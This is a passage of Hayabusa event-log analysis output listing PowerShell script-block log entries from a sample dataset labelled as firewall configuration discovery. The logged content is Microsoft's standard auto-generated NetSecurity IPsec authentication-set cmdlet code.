${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 
'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 
'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { 
[object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 
NetIPsecPhase2AuthSet ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] 